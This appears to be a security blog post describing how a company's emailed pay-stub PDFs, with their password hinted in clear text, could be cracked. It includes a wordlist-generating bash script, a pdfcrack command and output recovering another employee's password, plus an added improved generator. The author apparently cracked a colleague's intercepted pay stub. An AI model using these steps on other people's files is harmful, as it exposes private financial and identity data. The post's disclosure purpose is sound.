One area that was also overlooked dealt with how our company delivered pay stubs. Yes, our own pay information was exposed for the taking to anybody who could intercept email and had basic scripting skills.
Every 2 weeks we would get a clear-text email with a single attachment named "companyname_paystub.pdf". It was a basic password-protected PDF document (I redacted the company name from this posting to protect the guilty), but it looked something like this:
Okay, simple, right?
Yes indeed, it was simple to crack. In this case the details of the victim were in the body of the email, and the email itself gave you the clues to the password. And no, I'm not making this up; the clues were:
- the 1st letter of your last name
- the last 4 digits of your SSN
- and the user name, which could easily be enumerated from the mailto: address of the email
Yep, all of that was in a clear-text, unencrypted email, with a simple password-protected PDF attachment, sent through a possibly unlimited number of mail/internet hops. So if you were anywhere between our mail server and the business that built our e-PayStubs, you could easily harvest private information.
Okay, I admire that they were trying to be green, saving a tree or two and generating less paper, but when you put sensitive information in an email and then hand out clues on how to crack it, something is not right!
So let's look at how I cracked this using one of my favorite tools, pdfcrack.
Okay, 1st let's review the clues:
We need a dictionary file that contains the 1st letter of the last name followed by 4 digits. The victim in this case was an email that I intercepted accidentally. The victim's last name started with d, so I needed the combinations d0000 through d9999, only 10,000 candidates in total.
NOTE: The last name of the victim could easily be extracted from the email recipient address, by a little social engineering, or by a simple directory lookup if you had a phone system that offered the calling party a directory listing. These systems are convenient, but they hand out recon information about your employees, and I typically frown upon them, though they exist in all sorts of businesses.
Okay, simple. Let's move on and look at how we cracked this egg wide open:
1st, I crafted a crude script to generate my dictionary file. My Perl scripting skills are bad, so I used a simple bash shell script, something like the following, to build my dictionary:
100:~ kenfelix1$ cat makedict1.sh
#!/bin/bash
#
# ken felix the hacker @ hyperfeed dot com keeping-her-afe :)
#
# my crude simple script for making my dictionary files 0000-thru-9999
# usage: ./makedict1.sh <1st character of the lastname>
#
# 1st loop: 1 thru 9999 with no zero padding, so 0000-0999 are missing here
for ((a=1; a <= 9999 ; a++))
do echo "$1$a"
done
# 2nd loop: 10000000 thru 10009999; the leading "1000" gets stripped with sed
# afterwards, which leaves the zero-padded values 0000 thru 9999
for ((b=10000000; b <= 10009999 ; b++))
do echo "$1$b"
done
The reason for the 2nd loop was that I had no quick idea of how to generate the zero-padded sequence 0000-0999. When the two loops are executed and the output redirected to a file, this gives you the sequences 1 through 9999 and 10000000 through 10009999, each prefixed with the 1st character of the victim's last name supplied on the command line. Stripping the leading "1000" from the second range then yields the zero-padded values 0000 through 9999.
2nd, I then used sed to clean the file up some (note that the pattern also matches the single entry d1000 from the first loop and reduces it to a bare "d", which is harmless since the second loop supplies d1000 anyway):
100:~ kenfelix1$ ./makedict1.sh d > myhackingfile.txt ; sed s/d1000/d/g myhackingfile.txt > final.txt
100:~ kenfelix1$ cat final.txt | wc -l
19999
100:~ kenfelix1$
Okay, it's a little bigger than planned (every value from 1 to 9999 appears twice, once unpadded and once zero-padded), but 19,999 lines is still a small file, and it covers the full range needed to break the password on the encrypted PDF.
3rd, so now I have this file starting with:
100:~ kenfelix1$ cat final.txt | head -n 3
d1
d2
d3
and ending with:
100:~ kenfelix1$ cat final.txt | tail -n 3
d9997
d9998
d9999
So that covers the password range for the victim's paystub. With pdfcrack you can now run the wordlist against the PDF file by executing the following command:
pdfcrack -w "supplied dictionary wordlist" -f "targeted pdf"
That will crack the PDF with your wordlist if a match is found. So let's run it with my wordlist against the PDF file:
# pdfcrack -w final.txt victim_paystub.pdf
PDF version 1.4
Security Handler: Standard
V: 2
R: 3
P: -4
Length: 128
Encrypted Metadata: True
FileID: 8ad5392d2b990944a5b5f7ba1d3b000d
U: 61e8eae0e2f9ebd5020487b4c504e19700000000000000000000000000000000
O: 1dbee41c901b7b6c50e4b965eb983b6cf989135e1b37c46a9e0b0cdcc2c89a4d
found user-password: 'd6832'
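As an added example (not the script from the original post), here is how the same candidate list can be built in one pass using printf's zero padding, which removes the need for the second loop and the sed clean-up. It also shows that even when the initial letter is unknown the whole keyspace is only 26 x 10,000 = 260,000 candidates, which pdfcrack exhausts in seconds. The letter, the output file name and the PDF name are placeholders chosen for illustration.

```bash
#!/bin/bash
# Added example, not the script from the original post.
# Build the candidate list for the pay-stub password scheme described above:
# 1st letter of the last name followed by the last 4 digits of the SSN, i.e.
# exactly 10,000 candidates per letter. printf '%04d' zero-pads 0-999, so a
# single loop covers d0000 through d9999 and no sed clean-up is needed.
set -eu

# Print every candidate for one initial letter: <letter>0000 .. <letter>9999
make_wordlist() {
    local letter="$1" n
    for ((n = 0; n <= 9999; n++)); do
        printf '%s%04d\n' "$letter" "$n"
    done
}

# The whole keyspace when the initial is unknown: 26 x 10,000 = 260,000 lines,
# still trivial for pdfcrack to exhaust.
make_all_letters() {
    local l
    for l in {a..z}; do
        make_wordlist "$l"
    done
}

# Helpers for sanity-checking a list before handing it to pdfcrack
count_words() { make_wordlist "$1" | wc -l | tr -d ' '; }
first_word()  { make_wordlist "$1" | head -n 1; }
last_word()   { make_wordlist "$1" | tail -n 1; }

# Usage (file names are placeholders):
#   ./makedict.sh d > final.txt
#   pdfcrack -w final.txt -f victim_paystub.pdf
if [ -n "${1-}" ]; then
    make_wordlist "$1"
fi
```

Because each candidate is exactly one letter plus four digits, there is no need for sed post-processing and no duplicate entries, so the list is half the size of the one above while covering the same password space.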
So there you have it, a very simple hack.
Things we should all take away from this post:
- be careful not to leak sensitive or classified information into an email
- don't send password clues or hints over an unsecured channel
- protect your clients' privacy
- just as important, protect your employees' privacy
I hope this post was helpful.
Ken Felix
Freelance Network Security Personnel
kfelix at hyperfeed dot com